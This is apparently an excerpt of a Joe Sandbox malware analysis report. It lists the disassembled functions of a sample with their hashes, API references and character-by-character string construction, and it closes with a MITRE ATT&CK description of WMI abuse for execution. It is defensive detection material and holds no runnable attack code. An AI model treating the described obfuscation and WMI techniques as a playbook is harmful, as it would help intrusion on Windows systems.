Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d070f04923f153c33e137f5f9538ae480bed25dd835adb5918eadcdfe7ee912d
Instruction ID: 35080513d9a0716b8b8ec912784de70f1989bca280f83ee4fe822c47fcb703f2
Opcode Fuzzy Hash: d070f04923f153c33e137f5f9538ae480bed25dd835adb5918eadcdfe7ee912d
Instruction Fuzzy Hash: 9151037651C3918BD728DF28D851AAFB7E1FF85304F08896DE8C687292E7399901CB46

Function 007CD330 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1886cfc3e2205de2d4c8ca193b60520488e3ea819ee8f6dc0ea6e1c6fc861d96
Instruction ID: 641383d6e7d7349c941ef0784096bcc7cc2f5de1acb5be2c7ce80fd07e2a30ff
Opcode Fuzzy Hash: 1886cfc3e2205de2d4c8ca193b60520488e3ea819ee8f6dc0ea6e1c6fc861d96
Instruction Fuzzy Hash: 8A41CE7161A641DFC7088F38D85052AB7F2FB8A321F19897ED886D7250E338E951CB55

Function 00798B50 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080b9451aafd0f102d2fbcd689eec89c8f8ee7975cfea1d7c53691420701ee52
Instruction ID: 3df704034d48d475fb7c8f1e08355bdeb9cffaa4b42b0512e14fbcce9c6447c7
Opcode Fuzzy Hash: 080b9451aafd0f102d2fbcd689eec89c8f8ee7975cfea1d7c53691420701ee52
Instruction Fuzzy Hash: 4D31C12268A7058FEB684A28AC916B6B781CB53320F0E43BDC9515B3D2D91C4D09D3B6

Function 007BAFDB Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4692326bfcd1664b736616d5e38802b7dbfbb34300cd9f6b45d1b462e12cd97a
Instruction ID: ce245b55eab5b379cae0f2513e9af7765b8286d785cec4e907c08a6ba59383aa
Opcode Fuzzy Hash: 4692326bfcd1664b736616d5e38802b7dbfbb34300cd9f6b45d1b462e12cd97a
Instruction Fuzzy Hash: D63103B560A200EFE6305F64EC45BBB73B4BB55300F40942AFA88A3142EA39D811CB96

Function 007BE784 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4321d3eb2a997f28a186e8697d9c3f39d841c1d2674376198087011d14e67a6f
Instruction ID: 439ea013904331d4f69f87bfa601cb591abaa2002d768b985c9485619c0afa24
Opcode Fuzzy Hash: 4321d3eb2a997f28a186e8697d9c3f39d841c1d2674376198087011d14e67a6f
Instruction Fuzzy Hash: EC31E3A05183D18EEB258F348464BF67FE09B63308F185DADD2C6AB283D6398106C766

Function 007B06F0 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c18aaacd73cfce77991f4faaa84c8431d39554e28d4d5d70709d16786482ddc
Instruction ID: 925d7ddc2cbc5fe8c8b38021050b0da375368b9b9a0bcc17583c6009beb9bc96
Opcode Fuzzy Hash: 5c18aaacd73cfce77991f4faaa84c8431d39554e28d4d5d70709d16786482ddc
Instruction Fuzzy Hash: D2511921608FC1CEE335CA398858797BFD35BA7214F098A9DD0FA8B2D6D77564068723

Function 007BABF8 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85779e73a6cdad29a50c4c56d926cfd3b3e56e2025106caa67e7aae40bcddfe4
Instruction ID: 90615e0873b9cea69ea6da5a1166540e167029872f3fde24a6eb8fb18d566654
Opcode Fuzzy Hash: 85779e73a6cdad29a50c4c56d926cfd3b3e56e2025106caa67e7aae40bcddfe4
Instruction Fuzzy Hash: FB21F83020A300BBDB59AB24A9D177A7B66FB51704F50B42DE58323252D629DC028B6F

Function 007B4DC0 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cafc408cda56745e50981a29a0a0f26834936aa7a28ba9d7e372e3fabed19b1c
Instruction ID: 9a504c53543c9535f5f52953a199dd91d6a537f9883365195381b93a3e4a83cb
Opcode Fuzzy Hash: cafc408cda56745e50981a29a0a0f26834936aa7a28ba9d7e372e3fabed19b1c
Instruction Fuzzy Hash: 7E217337A88318DBC3209FA4A880A76F3F3BBC5310F2A551CC884A3212D235ED008BC8

Function 007CC33D Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07009b0892112185e7989d9d0e300b0d9895d0c607f9f6a91d2ebecd6b4d37ac
Instruction ID: 7db0e3e5046842f0f80356d7097ce73912a3477a97b92893cf39183b8551cbc7
Opcode Fuzzy Hash: 07009b0892112185e7989d9d0e300b0d9895d0c607f9f6a91d2ebecd6b4d37ac
Instruction Fuzzy Hash: 9F112973E511A04BD31CCF29CC5247A77A2D7D631531E826ED85793391D7394D0283D4

Function 007C42E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: e94f9bd2cb49d4b662736c0f767d96ed4d0e189025bc22fa7d17e8b34f8d6972
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 42110633B051D14EC3128D3C8410AA9BFF31AE3735F59439DE4B4AB2D2D62A8D8A8350

Function 007BB380 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66116ca51413bb69ab787466092ab16813b115ef93d4b4d95bd9a6a1b53a0bf5
Instruction ID: 02f93506b46c07230e539de34094abdaac338c6c99eeff006c48c4b4631c497e
Opcode Fuzzy Hash: 66116ca51413bb69ab787466092ab16813b115ef93d4b4d95bd9a6a1b53a0bf5
Instruction Fuzzy Hash: 9F0171F2A003018BEB249E54E8C576BB2E9AF84714F18552CEC4957202EBBDFC05C7A1

Function 007B8DC5 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489737ced9f5b3d1228f944d6c5e588d0ae957e6daefbfb65c440208665353a8
Instruction ID: e595e1d7ecb9a874da4990c8ee361facff245bf5112a8d70097ccdb5e49ef789
Opcode Fuzzy Hash: 489737ced9f5b3d1228f944d6c5e588d0ae957e6daefbfb65c440208665353a8
Instruction Fuzzy Hash: 5B019E31608210EFE7598F14D481A7FB3F6BB9A710F54D52DE58623212D738EC02CB9A

Function 007B8912 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20f9f650e7c4d34dfa14add49e761b7461370708a85647bae00b4633b22f3a0
Instruction ID: a1715160078c5293bb5d31a27322ea6eb82c352824b3e30d06f3b4b6d9a77438
Opcode Fuzzy Hash: d20f9f650e7c4d34dfa14add49e761b7461370708a85647bae00b4633b22f3a0
Instruction Fuzzy Hash: 79F0A430209200CBE6544B24D59066FB3A5B7CA350F55D62FC58A33601CA38AC02CB9B

Function 00792B90 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bd664b363e94c5dd865838776f83db18b676a2759d0a73ca198eee73e3a124e
Instruction ID: 4205eccf029c45320bbcd578387cdc2822d9212aeb741ddbe76f5ca1447c4216
Opcode Fuzzy Hash: 6bd664b363e94c5dd865838776f83db18b676a2759d0a73ca198eee73e3a124e
Instruction Fuzzy Hash: 96F0B47B7186162BE610DD6ABCC0927B3D6E7C6304B098438EA41D3602D565E806C294

Function 007B9D1E Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72eddc3b7f86ce2bb223a167adf4fe63a5fc415d7ab3c8b23cd0962adfa5fdca
Instruction ID: 13836da65b9162eaf272b73bb7317f70d139e26f6fac26d11a542fee86158856
Opcode Fuzzy Hash: 72eddc3b7f86ce2bb223a167adf4fe63a5fc415d7ab3c8b23cd0962adfa5fdca
Instruction Fuzzy Hash: 8BF062313086109BE6185A16E55267BF3F1ABD3310F15DA2DD78623611C63CE802C785

Function 007BAEB3 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db557c48300bd2e4bb10f4ecaf3bbd4a4ff5d1d072b80e5f33ddeb984c17fc9
Instruction ID: 4f458c3f3435bd211c1ce5952c37ac47501a40184033515c897df02c95e08def
Opcode Fuzzy Hash: 3db557c48300bd2e4bb10f4ecaf3bbd4a4ff5d1d072b80e5f33ddeb984c17fc9
Instruction Fuzzy Hash: AAF0B47060A200BFDB145F2491D12BB73A1A76A300F90742CE9C227102C138E8058756

Function 007C1946 Relevance: 35.2, APIs: 1, Strings: 19, Instructions: 160memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 007C19CC

Strings

W, xrefs: 007C1B6A
x, xrefs: 007C1977
0, xrefs: 007C1C71
?, xrefs: 007C1B0A
6, xrefs: 007C19F2
K, xrefs: 007C1BBA
], xrefs: 007C1B8A
b, xrefs: 007C1959
_, xrefs: 007C1B2A
Z, xrefs: 007C1B3A
X, xrefs: 007C1B7A
^, xrefs: 007C1BAA
N, xrefs: 007C1B9A
d, xrefs: 007C1963
R, xrefs: 007C1B4A
3, xrefs: 007C1B5A
R, xrefs: 007C1B1A
f, xrefs: 007C196D
g, xrefs: 007C1972

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: AllocString
String ID: 0$3$6$?$K$N$R$R$W$X$Z$]$^$_$b$d$f$g$x
API String ID: 2525500382-3404372981
Opcode ID: df1fcc521058b075008bf3c7f83851fb8731b4dea2a3024a0158a8cf61a3bf8a
Instruction ID: bff77ce09dfcef79384666fa8555bbf021cf7412aed90f26a4e2e35bc2caab6b
Opcode Fuzzy Hash: df1fcc521058b075008bf3c7f83851fb8731b4dea2a3024a0158a8cf61a3bf8a
Instruction Fuzzy Hash: A791D32010CBD28AE332C73C885878FBED16BA7224F084B9DE4E95B2D2D3B54545C763

Function 007C1265 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 95COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 007C12B2

Strings

B, xrefs: 007C132C
N, xrefs: 007C1318
G, xrefs: 007C1345
L, xrefs: 007C130E
H, xrefs: 007C12FA
J, xrefs: 007C1304
@, xrefs: 007C1322
P, xrefs: 007C12D2
V, xrefs: 007C12F0
T, xrefs: 007C12E6
D, xrefs: 007C1336
R, xrefs: 007C12DC
F, xrefs: 007C1340

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: InitVariant
String ID: @$B$D$F$G$H$J$L$N$P$R$T$V
API String ID: 1927566239-89143503
Opcode ID: 6602753ec8bc0475595886a58ffadb876cc3d3f67f5b77c3d8de5886f065fc9e
Instruction ID: fbffbf7afbb1503a4cd07b5c6f6dca73d3e2473179c93e1639b15609f45bfd37
Opcode Fuzzy Hash: 6602753ec8bc0475595886a58ffadb876cc3d3f67f5b77c3d8de5886f065fc9e
Instruction Fuzzy Hash: 5541077110C7C18AD326DB78845879BBFE16BD6318F088A5DE1E94B3D2D7B88409C757

Function 007C165E Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 93COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 007C1668
VariantInit.OLEAUT32 ref: 007C167B

Strings

~, xrefs: 007C16BB
y, xrefs: 007C1701
y, xrefs: 007C16ED
X, xrefs: 007C16E3
l, xrefs: 007C169D
|, xrefs: 007C16C5
c, xrefs: 007C16A7
m, xrefs: 007C16D9
s, xrefs: 007C16CF
w, xrefs: 007C16F7

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: X$c$l$m$s$w$y$y$|$~
API String ID: 2610073882-1425934243
Opcode ID: 563100e153728e5362fc5ece1522cd9b2966868a383cf75d361635b491170c0e
Instruction ID: 3ef62d4ec7a7dade1c9d8faeb6c9f4d7c76aa900f05dbe8f7897332354d86b14
Opcode Fuzzy Hash: 563100e153728e5362fc5ece1522cd9b2966868a383cf75d361635b491170c0e
Instruction Fuzzy Hash: 1A41463150C7C18ED335CB38884869EBFE1AB96324F084E6DE5E8872E6C6798545C767

Function 007BD325 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 250COMMON

Download Yara Rule

Strings

EmQu, xrefs: 007BD5E1
pq, xrefs: 007BD64E
OZlk, xrefs: 007BD42B
8, xrefs: 007BD4FE
7, xrefs: 007BD5A4

Memory Dump Source

Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd

Similarity

API ID:
String ID: 7$8$EmQu$OZlk$pq
API String ID: 0-859822191
Opcode ID: 643f4438400cfd5481105c4073d77c82918abb0a23b2ac3f67de8cda5b9b7189
Instruction ID: fc7b993bded91ccbcd21972c8ba88763ea5cb5ff889a4d892030d1b1244f01cb
Opcode Fuzzy Hash: 643f4438400cfd5481105c4073d77c82918abb0a23b2ac3f67de8cda5b9b7189
Instruction Fuzzy Hash: E771076060C3D18BD3348B2984617EBBBD19F93315F28896DD4C94B382EB7D580ACB62

Function 00B1E3F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMTD ref: 00B1E43D
___except_validate_context_record.LIBVCRUNTIMED ref: 00B1E449

Part of subcall function 00B1ED30: __guard_icall_checks_enforced.LIBCMTD ref: 00B1ED36

__IsNonwritableInCurrentImage.LIBCMTD ref: 00B1E505
_ValidateLocalCookies.LIBCMTD ref: 00B1E570
_ValidateLocalCookies.LIBCMTD ref: 00B1E5C3

Strings

csm, xrefs: 00B1E4EF

Memory Dump Source

Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
String ID: csm
API String ID: 3439031638-1018135373
Opcode ID: 3b900100162f11771ac5e78209d7d8422510e29c49c2f70ac9db94e1383d3602
Instruction ID: 25bb302b93020de74845f76ddecdc304ecb59a0cb8dd82553ea8e83da69b8e5c
Opcode Fuzzy Hash: 3b900100162f11771ac5e78209d7d8422510e29c49c2f70ac9db94e1383d3602
Instruction Fuzzy Hash: 2651DB74E00209DFCB04DF94D881AEEBBB2FF48314F548598E9256B391D735EA81CBA1

Function 00B1F530 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00B1F437,00000000,00000800,?,?,00B1F437,00000000), ref: 00B1F53F
GetLastError.KERNEL32(?,?,00B1F437), ref: 00B1F553
_wcsncmp.LIBCMTD ref: 00B1F569
LoadLibraryExW.KERNEL32(00B1F437,00000000,00000000,?,00B1F437), ref: 00B1F57D

Strings

api-ms-, xrefs: 00B1F560

Memory Dump Source

Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd

Similarity

API ID: LibraryLoad$ErrorLast_wcsncmp
String ID: api-ms-
API String ID: 4169583555-2084034818
Opcode ID: 80e0731cf1f7796e428332d288ef21772386fd01d6a259799901766a35d6ffe3
Instruction ID: d1f5408ad70240f22524e70f40bb88b1e8a0cc11a0d49b7871787511df4b432f
Opcode Fuzzy Hash: 80e0731cf1f7796e428332d288ef21772386fd01d6a259799901766a35d6ffe3
Instruction Fuzzy Hash: D9F09074A0420AFBDB008FA0DC4AFBD37E5AB49700F6081B0F909DB281DA70EB80C790

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
